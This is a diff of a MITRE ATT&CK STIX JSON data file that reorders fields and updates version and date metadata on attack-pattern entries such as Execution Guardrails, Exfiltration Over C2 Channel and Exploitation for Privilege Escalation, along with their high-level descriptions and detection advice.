+ "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.",
"id": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -9491,30 +9898,31 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2019-07-19T14:59:44.034Z",
+ "modified": "2020-06-24T18:52:12.956Z",
"created": "2019-01-31T02:10:08.261Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_contributors": [
- "Nick Carr, FireEye"
- ],
- "x_mitre_data_sources": [
- "Process monitoring"
- ],
- "x_mitre_detection": "Detecting the action of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.1",
"x_mitre_defense_bypassed": [
"Anti-virus",
"Host forensic analysis",
"Signature-based detection",
- "Static File Analysis"
+ "Static file analysis"
],
- "x_mitre_version": "1.0"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
+ "x_mitre_data_sources": [
+ "Process monitoring"
+ ],
+ "x_mitre_contributors": [
+ "Nick Carr, FireEye"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -9550,17 +9958,7 @@
],
"modified": "2020-03-28T00:50:31.548Z",
"created": "2017-05-31T21:30:44.720Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_contributors": [
- "Alfredo Abarca"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_network_requirements": true,
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+ "x_mitre_version": "1.2",
"x_mitre_data_sources": [
"Process monitoring",
"Process use of network",
@@ -9568,7 +9966,17 @@
"Netflow/Enclave netflow",
"Network protocol analysis"
],
- "x_mitre_version": "1.2"
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+ "x_mitre_network_requirements": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_contributors": [
+ "Alfredo Abarca"
+ ],
+ "x_mitre_is_subtechnique": false
},
{
"external_references": [
@@ -9599,21 +10007,21 @@
],
"modified": "2020-03-28T00:45:51.014Z",
"created": "2020-03-15T15:34:30.767Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) ",
"x_mitre_data_sources": [
"Network protocol analysis",
"Netflow/Enclave netflow",
"Packet capture",
"Process use of network"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) ",
- "x_mitre_network_requirements": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -9639,23 +10047,33 @@
],
"modified": "2020-03-28T00:34:55.439Z",
"created": "2020-03-09T17:07:57.392Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
"x_mitre_data_sources": [
"Process monitoring",
"User interface"
],
- "x_mitre_detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:30:41.804Z",
+ "modified": "2020-03-12T15:59:47.470Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "exfiltration"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Exfiltration Over C2 Channel",
+ "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -9668,19 +10086,9 @@
"source_name": "University of Birmingham C2"
}
],
- "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
- "name": "Exfiltration Over C2 Channel",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "exfiltration"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-12T15:59:47.470Z",
- "created": "2017-05-31T21:30:41.804Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -9721,22 +10129,22 @@
],
"modified": "2020-03-28T00:35:24.570Z",
"created": "2017-05-31T21:30:25.159Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "User interface",
- "Process monitoring"
- ],
- "x_mitre_contributors": [
- "Itzik Kotler, SafeBreach"
- ],
- "x_mitre_detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
- "x_mitre_network_requirements": true,
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
+ "x_mitre_contributors": [
+ "Itzik Kotler, SafeBreach"
+ ],
+ "x_mitre_data_sources": [
+ "User interface",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549",
@@ -9762,23 +10170,23 @@
],
"modified": "2020-03-28T00:31:48.713Z",
"created": "2017-05-31T21:30:46.461Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Data loss prevention",
- "File monitoring"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_system_requirements": [
+ "Presence of physical medium or device"
],
- "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
- "x_mitre_network_requirements": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_system_requirements": [
- "Presence of physical medium or device"
+ "x_mitre_network_requirements": false,
+ "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Data loss prevention",
+ "File monitoring"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -9809,11 +10217,10 @@
],
"modified": "2020-03-28T00:43:24.228Z",
"created": "2020-03-15T15:30:42.378Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) \n\nArtifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. ",
"x_mitre_data_sources": [
"Malware reverse engineering",
"Network protocol analysis",
@@ -9821,10 +10228,11 @@
"Packet capture",
"Process use of network"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) \n\nArtifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. ",
- "x_mitre_network_requirements": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -9855,21 +10263,21 @@
],
"modified": "2020-03-28T00:50:31.361Z",
"created": "2020-03-15T15:37:47.583Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ",
"x_mitre_data_sources": [
"Network protocol analysis",
"Netflow/Enclave netflow",
"Packet capture",
"Process use of network"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ",
- "x_mitre_network_requirements": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -9895,11 +10303,10 @@
],
"modified": "2020-03-28T01:02:24.276Z",
"created": "2020-03-09T12:51:45.570Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
"x_mitre_data_sources": [
"Process monitoring",
"Process use of network",
@@ -9908,10 +10315,11 @@
"Network protocol analysis",
"SSL/TLS inspection"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
- "x_mitre_network_requirements": true,
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -9937,24 +10345,40 @@
],
"modified": "2020-03-28T00:31:02.204Z",
"created": "2020-03-11T13:50:11.467Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Presence of physical medium or device"
],
+ "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
"x_mitre_data_sources": [
"Process monitoring",
"Data loss prevention",
"File monitoring"
],
- "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
- "x_mitre_system_requirements": [
- "Presence of physical medium or device"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
+ "created": "2020-03-09T15:04:32.767Z",
+ "modified": "2020-03-28T01:02:24.172Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "exfiltration"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b",
+ "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ",
+ "name": "Exfiltration to Cloud Storage",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -9962,22 +10386,6 @@
"url": "https://attack.mitre.org/techniques/T1567/002"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Exfiltration to Cloud Storage",
- "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ",
- "id": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "exfiltration"
- }
- ],
- "modified": "2020-03-28T01:02:24.172Z",
- "created": "2020-03-09T15:04:32.767Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -10020,11 +10428,10 @@
],
"modified": "2020-03-28T00:58:55.433Z",
"created": "2020-03-09T14:51:11.772Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
"x_mitre_data_sources": [
"Process monitoring",
"Process use of network",
@@ -10033,10 +10440,11 @@
"Network protocol analysis",
"SSL/TLS inspection"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
- "x_mitre_network_requirements": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -10087,15 +10495,11 @@
],
"modified": "2020-02-18T16:10:38.866Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS",
- "AWS",
- "GCP",
- "Azure"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Praetorian"
],
- "x_mitre_detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
+ "x_mitre_version": "2.1",
"x_mitre_data_sources": [
"Azure activity logs",
"AWS CloudTrail logs",
@@ -10105,11 +10509,15 @@
"Web application firewall logs",
"Application logs"
],
- "x_mitre_version": "2.1",
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS",
+ "AWS",
+ "GCP",
+ "Azure"
+ ]
},
{
"object_marking_refs": [
@@ -10135,23 +10543,23 @@
],
"modified": "2020-03-28T19:06:02.690Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_remote_support": true,
- "x_mitre_system_requirements": [
- "Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise."
- ],
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
- ],
- "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
+ "x_mitre_version": "1.1",
"x_mitre_data_sources": [
"Anti-virus",
"System calls",
"Process monitoring"
],
- "x_mitre_version": "1.1"
+ "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_system_requirements": [
+ "Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise."
+ ],
+ "x_mitre_remote_support": true,
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36",
@@ -10187,25 +10595,25 @@
],
"modified": "2020-03-25T18:51:01.070Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "John Lambert, Microsoft Threat Intelligence Center"
- ],
- "x_mitre_data_sources": [
- "Authentication logs",
- "Windows Error Reporting",
- "Process monitoring"
- ],
- "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.",
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.",
+ "x_mitre_data_sources": [
+ "Authentication logs",
+ "Windows Error Reporting",
+ "Process monitoring"
+ ],
+ "x_mitre_contributors": [
+ "John Lambert, Microsoft Threat Intelligence Center"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b",
@@ -10231,35 +10639,43 @@
],
"modified": "2020-03-29T20:00:46.900Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "John Lambert, Microsoft Threat Intelligence Center"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.",
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "System access controls"
],
"x_mitre_data_sources": [
"Windows Error Reporting",
"Process monitoring",
"File monitoring"
],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "System access controls"
+ "x_mitre_contributors": [
+ "John Lambert, Microsoft Threat Intelligence Center"
],
- "x_mitre_detection": "Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
- "id": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Exploitation for Privilege Escalation",
- "description": "Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.",
+ "created": "2017-05-31T21:30:55.066Z",
+ "modified": "2020-03-26T21:12:49.194Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -10267,18 +10683,10 @@
"external_id": "T1068"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
- ],
- "modified": "2020-03-26T21:12:49.194Z",
- "created": "2017-05-31T21:30:55.066Z",
+ "description": "Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.",
+ "name": "Exploitation for Privilege Escalation",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839",
"x_mitre_version": "1.2",
"x_mitre_data_sources": [
"Windows Error Reporting",
@@ -10300,10 +10708,18 @@
"x_mitre_is_subtechnique": false
},
{
- "id": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Exploitation of Remote Services",
- "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.",
+ "created": "2018-04-18T17:59:24.739Z",
+ "modified": "2020-02-04T20:14:11.064Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "lateral-movement"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -10331,18 +10747,10 @@
"source_name": "NVD CVE-2014-7169"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "lateral-movement"
- }
- ],
- "modified": "2020-02-04T20:14:11.064Z",
- "created": "2018-04-18T17:59:24.739Z",
+ "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.",
+ "name": "Exploitation of Remote Services",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82",
"x_mitre_version": "1.1",
"x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
"x_mitre_data_sources": [
@@ -10405,8 +10813,19 @@
"phase_name": "impact"
}
],
